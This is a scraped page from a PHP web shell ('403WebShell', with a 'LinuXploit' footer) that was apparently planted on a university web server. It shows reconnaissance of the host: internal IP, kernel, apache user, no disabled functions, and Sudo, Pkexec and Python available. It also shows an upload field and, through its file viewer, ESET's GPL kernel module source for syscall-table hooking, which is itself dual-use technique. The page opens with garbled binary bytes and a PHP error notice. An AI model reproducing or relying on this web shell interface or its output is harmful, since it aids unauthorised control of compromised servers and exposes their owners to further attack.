403WebShell

h( )($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms��Sb�,;R''6c2I�!\��kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K��x)1�6@r*2�89ma��&��'ti��{~#��t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1��w�r��l&-t*3�<<�u��#��j&.u��J68\8?"#$%&'()*+,-./0 !
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell403Webshell

Server IP : 10.254.12.21 / Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON | cURL : ON | WGET : OFF | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON
Directory : /var/opt/eset/efs/eventd/eset_rtp/

Upload File :

[ Back ]

Current File : /var/opt/eset/efs/eventd/eset_rtp/ertp_syscalls.c

/*
 * eset_rtp (ESET Real-time file system protection module)
 * Copyright (C) 1992-2021 ESET, spol. s r.o.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 *
 * In case of any questions, you can contact us at ESET, spol. s r.o., Einsteinova 24, 851 01 Bratislava, Slovakia.
 */

#include "ertp_syscalls.h"
#include "ertp.h"

#include <linux/fcntl.h>
#include <linux/string.h>
#include <linux/types.h>
#include <asm/pgtable_types.h>

static syscall_ptr_t *syscall_table_64b = NULL; /* address of 64bit syscall table */
static syscall_ptr_t *syscall_table_32b = NULL; /* address of 32bit syscall table */

struct ertp_sys_hook ertp_hooks[N_ERTP_SYSCALLS] = {
	{ { NULL, NULL }, { NULL, NULL }, { NULL, NULL } }, /* ERTP_SYSCALL_OPEN */
	{ { NULL, NULL }, { NULL, NULL }, { NULL, NULL } }, /* ERTP_SYSCALL_OPENAT */
	{ { NULL, NULL }, { NULL, NULL }, { NULL, NULL } }, /* ERTP_SYSCALL_CLOSE */
	{ { NULL, NULL }, { NULL, NULL }, { NULL, NULL } }, /* ERTP_SYSCALL_EXIT */
	{ { NULL, NULL }, { NULL, NULL }, { NULL, NULL } }, /* ERTP_SYSCALL_EXIT_GROUP */
	{ { NULL, NULL }, { NULL, NULL }, { NULL, NULL } }, /* ERTP_SYSCALL_EXECVE */
	{ { NULL, NULL }, { NULL, NULL }, { NULL, NULL } }, /* ERTP_SYSCALL_dup2 */
	{ { NULL, NULL }, { NULL, NULL }, { NULL, NULL } }, /* ERTP_SYSCALL_dup3 */
	{ { NULL, NULL }, { NULL, NULL }, { NULL, NULL } }, /* ERTP_SYSCALL_unlink */
	{ { NULL, NULL }, { NULL, NULL }, { NULL, NULL } }, /* ERTP_SYSCALL_unlinkat */
	{ { NULL, NULL }, { NULL, NULL }, { NULL, NULL } }, /* ERTP_SYSCALL_rename */
	{ { NULL, NULL }, { NULL, NULL }, { NULL, NULL } }, /* ERTP_SYSCALL_renameat */
#if (LINUX_VERSION_CODE >= KERNEL_VERSION(3,15,0))
	{ { NULL, NULL }, { NULL, NULL }, { NULL, NULL } }, /* ERTP_SYSCALL_renameat2 */
#endif
};

int ertp_sys_hooks_init(unsigned long k32, unsigned long k64)
{
	if (syscall_table_32b || syscall_table_64b) {
		ertp_pr_error("attempt to double register hooks");
		return -EEXIST;
	}

	syscall_table_32b = (syscall_ptr_t *)k32;
	syscall_table_64b = (syscall_ptr_t *)k64;

	return 0;
}

/* Enable (rw = 1) or disable (rw = 0) Read-Write flag for selected address (page),
 * returning previous RW flag value */
static int set_page_rw(void *addr, int rw)
{
	unsigned  level;
	pte_t    *pte = lookup_address((unsigned long)addr, &level); /* lookup_address will compute particular page start for us */
	int       had_rw = ((pte->pte & ~_PAGE_RW) != 0);

	if (rw)
		pte->pte |= _PAGE_RW;
	else
		pte->pte &= ~_PAGE_RW;

	return had_rw;
}

/* Set entry of syscall table to the provided address. Return previous entry value. */
static syscall_ptr_t set_syscall_table_entry(int syscall_no, syscall_ptr_t *syscall_table, void *ptr)
{
	syscall_ptr_t *syscall_addr_p = &syscall_table[syscall_no]; /* Pointer to the entry with selected syscall address */
	syscall_ptr_t  prev = (syscall_ptr_t)(*syscall_addr_p);
	int            prev_rw;

	ertp_pr_debug("setting systable entry at address %p to %p (prev = %p)",
		(void *)syscall_addr_p, ptr, (void *)prev);

	prev_rw = set_page_rw(syscall_addr_p, 1);
	*syscall_addr_p = (syscall_ptr_t)ptr;
	(void)set_page_rw(syscall_addr_p, prev_rw);

	return prev;
}

static int register_hook(int syscall_no, struct ertp_hook_pair *hook, syscall_ptr_t *syscall_table, void *func)
{
	if (!syscall_table) {
		ertp_pr_error("cannot register hook, syscall table not initialized");
		return -EFAULT;
	}

	if (hook->hooked_call) {
		ertp_pr_error("attempt to double register hook");
		return -EEXIST;
	}

	printk(KERN_DEBUG ESET_RTP ": registering hook for syscall %d\n", syscall_no);

	hook->original_call = set_syscall_table_entry(syscall_no, syscall_table, func);
	hook->hooked_call = (syscall_ptr_t)func;

	return 0;
}

int ertp_sys_hook_register(enum ertp_syscall_no number, void *func64, void *func32, void *funcx32)
{
	struct ertp_sys_hook *hook = &ertp_hooks[number];
	int err;

	if (func64 && (err = register_hook(ERTP_SYSCALL_NUMBERS_64[number], &hook->x86_64, syscall_table_64b, func64)) != 0)
		return err;

#ifdef CONFIG_IA32_EMULATION
	if (func32 && (err = register_hook(ERTP_SYSCALL_NUMBERS_32[number], &hook->ia32, syscall_table_32b, func32)) != 0)
		return err;
#endif

#ifdef CONFIG_X86_X32
	if (funcx32 && (err = register_hook(ERTP_SYSCALL_NUMBERS_X32[number], &hook->x32, syscall_table_64b, funcx32)) != 0)
		return err;
#endif

	return 0;
}

static int unregister_hook(int syscall_no, struct ertp_hook_pair *hook, syscall_ptr_t *syscall_table)
{
	syscall_ptr_t prev;

	if (!syscall_table)
		return -EINVAL;

	if (!hook->hooked_call || !hook->original_call)
		return -ENOENT;

	prev = set_syscall_table_entry(syscall_no, syscall_table, hook->original_call);

	/* Someone has overriden our hooks? */
	BUG_ON(prev != hook->hooked_call);

	printk(KERN_DEBUG ESET_RTP ": unregistered hook for syscall %d\n", syscall_no);

	hook->hooked_call = NULL;

	return 0;
}

void ertp_sys_hook_unregister(enum ertp_syscall_no number)
{
	struct ertp_sys_hook *hook = &ertp_hooks[number];
	int    err;

	err = unregister_hook(ERTP_SYSCALL_NUMBERS_64[number], &hook->x86_64, syscall_table_64b);

	if (err && err != -ENOENT) {
		ertp_pr_warning("error unregistering hook for 64-bit syscall %d", ERTP_SYSCALL_NUMBERS_64[number]);
	}

#ifdef CONFIG_IA32_EMULATION
	err = unregister_hook(ERTP_SYSCALL_NUMBERS_32[number], &hook->ia32, syscall_table_32b);

	if (err && err != -ENOENT) {
		ertp_pr_warning("error unregistering hook for 32-bit syscall %d", ERTP_SYSCALL_NUMBERS_32[number]);
	}
#endif

#ifdef CONFIG_X86_X32
	err = unregister_hook(ERTP_SYSCALL_NUMBERS_X32[number], &hook->x32, syscall_table_64b);

	if (err && err != -ENOENT) {
		ertp_pr_warning("error unregistering hook for x32 syscall %d", ERTP_SYSCALL_NUMBERS_X32[number]);
	}
#endif
}

void ertp_sys_hooks_unload(void)
{
	int i;

	for (i = 0; i < N_ERTP_SYSCALLS; i++) {
		ertp_sys_hook_unregister((enum ertp_syscall_no)i);
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit